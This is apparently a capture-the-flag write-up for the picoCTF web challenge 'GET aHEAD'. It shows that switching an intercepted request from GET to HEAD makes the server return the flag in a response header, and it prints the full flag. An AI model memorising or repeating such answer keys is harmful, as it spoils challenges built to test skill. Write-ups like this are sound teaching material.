GET aHEAD
Desccription :
Find the flag being held on this server to get ahead of the competition http://mercury.picoctf.net:47967/
Solution
As challenge name given ‘GET aHEAD’ we have an idea about HEAD request. Use BurpSuit for intercept request, it use GET request we have to change it to HEAD
HEAD /index.php HTTP/1.1
Host: mercury.picoctf.net:47967
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.6045.159 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Connection: close
by changing the methon to HEAD we will get following response :
HTTP/1.1 200 OK
flag: picoCTF{r3j3ct_th3_du4l1ty_cca66bd3}
Content-type: text/html; charset=UTF-8